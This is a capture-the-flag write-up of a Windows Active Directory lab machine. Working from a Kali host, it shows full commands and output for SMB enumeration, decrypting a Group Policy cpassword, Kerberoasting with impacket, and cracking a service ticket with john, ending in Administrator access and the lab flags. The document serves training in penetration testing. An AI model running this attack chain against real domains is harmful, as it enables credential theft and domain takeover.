Reading Time: 9 min read
Start 11:49 24-08-2024
10.10.10.100┌──(kali㉿kali)-[~]└─$ nmap -sC -sV -sT -Pn -T5 -vvvv -p- 10.10.10.100Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-24 10:49 IST
</SNIP>
Nmap scan report for 10.10.10.100Host is up, received user-set (0.087s latency).Scanned at 2024-08-24 10:49:31 IST for 560sNot shown: 64857 closed tcp ports (conn-refused), 655 filtered tcp ports (no-response)PORT STATE SERVICE REASON VERSION53/tcp open domain syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)| dns-nsid:|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-08-24 09:58:31Z)135/tcp open msrpc syn-ack Microsoft Windows RPC139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)445/tcp open microsoft-ds? syn-ack464/tcp open kpasswd5? syn-ack593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped syn-ack3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)3269/tcp open tcpwrapped syn-ack5722/tcp open msrpc syn-ack Microsoft Windows RPC9389/tcp open mc-nmf syn-ack .NET Message Framing47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049152/tcp open msrpc syn-ack Microsoft Windows RPC49153/tcp open msrpc syn-ack Microsoft Windows RPC49154/tcp open msrpc syn-ack Microsoft Windows RPC49155/tcp open msrpc syn-ack Microsoft Windows RPC49157/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.049158/tcp open msrpc syn-ack Microsoft Windows RPC49165/tcp open msrpc syn-ack Microsoft Windows RPC49166/tcp open msrpc syn-ack Microsoft Windows RPC49173/tcp open msrpc syn-ack Microsoft Windows RPCService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:| smb2-security-mode:| 2:1:0:|_ Message signing enabled and required| smb2-time:| date: 2024-08-24T09:59:27|_ start_date: 2024-08-24T09:48:49|_clock-skew: 45s| p2p-conficker:| Checking for Conficker.C or higher...| Check 1 (port 40109/tcp): CLEAN (Couldn't connect)| Check 2 (port 16497/tcp): CLEAN (Couldn't connect)| Check 3 (port 38631/udp): CLEAN (Timeout)| Check 4 (port 62495/udp): CLEAN (Failed to receive data)|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 10:58Completed NSE at 10:58, 0.00s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 10:58Completed NSE at 10:58, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 10:58Completed NSE at 10:58, 0.00s elapsedRead data files from: /usr/bin/../share/nmapService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 560.49 secondsEnumeration
Section titled “Enumeration”We have found a shit ton of open ports and we are dealing here with an Active Directory machine, meaning we need to work our way up to become the domain controller.
53/TCP - domain
Section titled “53/TCP - domain”Just like the name suggests, this is the top DNS Hierarchy, from where the Active Directory domain is being controlled. In this case it is running on Windows Server 2008 R2 SP1.
88/TCP - kerberos-sec
Section titled “88/TCP - kerberos-sec”This port is running Kerberos security which establishes the identity of users by validating their secret passwords.
==All MSRPC ports==
This stands for Microsoft Remote Procedure Call protocol, a client-server model enabling a program to request a service from a program located on another computer, without understanding the network specifics.
==445/TCP - SMB==
This port is running a Server Message Block on which shared files can be found. We can connect to this service using various tools such as smbclient.
I’ll start off by checking the SMB port.
443/TCP - SMB
Section titled “443/TCP - SMB”I used the following commands to connect to SMB with smbmap:
┌──(kali㉿kali)-[~]└─$ smbmap -H 10.10.10.100
________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)-----------------------------------------------------------------------------SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com> https://github.com/ShawnDEvans/smbmap
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS[/] Closing connections.. [-] Closing connections.. [*] Closed 1 connectionsUsing this tool I mapped the SMB server and found all shared directories. We found out that there is one that we have anonymous read access for = Replication.
I then used smbclient to connect to the SMB server in order to read the Replication directory.
┌──(kali㉿kali)-[~]└─$ smbclient -N //10.10.10.100/ReplicationAnonymous login successfulTry "help" to get a list of possible commands.smb: \> dir . D 0 Sat Jul 21 11:37:44 2018 .. D 0 Sat Jul 21 11:37:44 2018 active.htb D 0 Sat Jul 21 11:37:44 2018
5217023 blocks of size 4096. 277527 blocks availableHeading into active.htb we find some sub-directories. From here it was time to deep dive into a rabbit hole, I kept on enumerating the share until I came across this file:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir . D 0 Sat Jul 21 11:37:44 2018 .. D 0 Sat Jul 21 11:37:44 2018 Groups.xml A 533 Wed Jul 18 21:46:06 2018
5217023 blocks of size 4096. 278854 blocks availableI used the get command to download the file and in another terminal I used cat Groups.xml to read the file contents:
┌──(kali㉿kali)-[~]└─$ cat Groups.xml<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>It seems that we’ve found some credentials for the SVC_TGS user, now we just need to decrypt them. But now we need to know what hash type it is. I tried to check the complete hash usingHashcat but had no luck:
┌──(kali㉿kali)-[~]└─$ echo "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" > svc.hash
┌──(kali㉿kali)-[~]└─$ hashcat svc.hashhashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]==================================================================================================================================================* Device #1: cpu-penryn-AMD Ryzen 5 5600X 6-Core Processor, 2919/5902 MB (1024 MB allocatable), 4MCU
No hash-mode matches the structure of the input hash.Cracking GPP Hash
Section titled “Cracking GPP Hash”Seems we’ll have to do some Google research.
I searched for Group Policy Password encryption and found that there is a tool within Kali called gpp-decrypt where we can go ahead and enter the hash as an argument and it will crack it for us:
┌──(kali㉿kali)-[~]└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQGPPstillStandingStrong2k18That was fairly easy, now that we have credentials we can try and get further access.
SVC_TGSGPPstillStandingStrong2k18Foothold
Section titled “Foothold”We now log into SMB again but this time with the creds we’ve found. We also choose to login to the Users share, to do this we’ll use the following commands:
┌──(kali㉿kali)-[~]└─$ smbclient -N //10.10.10.100/Users --user=SVC_TGS --password=GPPstillStandingStrong2k18Try "help" to get a list of possible commands.smb: \> dir . DR 0 Sat Jul 21 15:39:20 2018 .. DR 0 Sat Jul 21 15:39:20 2018 Administrator D 0 Mon Jul 16 11:14:21 2018 All Users DHSrn 0 Tue Jul 14 06:06:44 2009 Default DHR 0 Tue Jul 14 07:38:21 2009 Default User DHSrn 0 Tue Jul 14 06:06:44 2009 desktop.ini AHS 174 Tue Jul 14 05:57:55 2009 Public DR 0 Tue Jul 14 05:57:55 2009 SVC_TGS D 0 Sat Jul 21 16:16:32 2018
5217023 blocks of size 4096. 278854 blocks availablesmb: \> cd SVC_TGS\smb: \SVC_TGS\> cd Desktop\smb: \SVC_TGS\Desktop\> dir . D 0 Sat Jul 21 16:14:42 2018 .. D 0 Sat Jul 21 16:14:42 2018 user.txt AR 34 Sat Aug 24 10:49:57 2024
5217023 blocks of size 4096. 278854 blocks availablesmb: \SVC_TGS\Desktop\> get user.txtgetting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \SVC_TGS\Desktop\>user.txt
Section titled “user.txt”As you see above we just need to head to the \SVC_TGS\Desktop\ directory where we will find the user.txt flag which we can then get and cat in another terminal.
┌──(kali㉿kali)-[~]└─$ cat user.txt62fe811bae25f5486e9c0e3367404a40Privilege Escalation
Section titled “Privilege Escalation”To further escalate our privileges we will have to use the impacket tool called GetUsersSPNs.py
We will namely use a technique called Kerberoasting for which I have used this blog as my guide.
impacket-GetUserSPNs -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoastSo to put it all together it should look something like this:
┌──(kali㉿kali)-[~]└─$ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -outputfile hashes.kerberoastImpacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2024-08-24 10:49:59.262558
[-] CCache file is not found. Skipping...When the password is prompted just enter the password for the SVC_TGS user.
We have now successfully found out that the Administrator user is indeed vulnerable to Kerberoasting. Now that we have the hash file we can crack it using either John or Hashcat.
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
OR
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txtI decided to use John in this case and got the following output:
┌──(kali㉿kali)-[~]└─$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoastUsing default input encoding: UTF-8Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for status0g 0:00:00:01 14.27% (ETA: 12:29:16) 0g/s 2231Kp/s 2231Kc/s 2231KC/s 48679..48135777Ticketmaster1968 (?) # Our cracked password1g 0:00:00:04 DONE (2024-08-24 12:29) 0.2123g/s 2237Kp/s 2237Kc/s 2237KC/s Tiffani1432..Thrash1Use the "--show" option to display all of the cracked passwords reliablySession completed.root.txt
Section titled “root.txt”So now we can go ahead and log into SMB again using the newly found creds:
AdministratorTicketmaster1968┌──(kali㉿kali)-[~]└─$ smbclient -N //10.10.10.100/Users --user=Administrator --password=Ticketmaster1968Try "help" to get a list of possible commands.smb: \> dir . DR 0 Sat Jul 21 15:39:20 2018 .. DR 0 Sat Jul 21 15:39:20 2018 Administrator D 0 Mon Jul 16 11:14:21 2018 All Users DHSrn 0 Tue Jul 14 06:06:44 2009 Default DHR 0 Tue Jul 14 07:38:21 2009 Default User DHSrn 0 Tue Jul 14 06:06:44 2009 desktop.ini AHS 174 Tue Jul 14 05:57:55 2009 Public DR 0 Tue Jul 14 05:57:55 2009 SVC_TGS D 0 Sat Jul 21 16:16:32 2018
5217023 blocks of size 4096. 278582 blocks availablesmb: \> cd Administrator/Desktopsmb: \Administrator\Desktop\> get root.txtgetting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \Administrator\Desktop\>Here we again get the root.txt flag and then cat the file to see the output:
┌──(kali㉿kali)-[~]└─$ cat root.txt1588debd15e4f2f00a9ca51963dd27a0
Finished 13:32 24-08-2024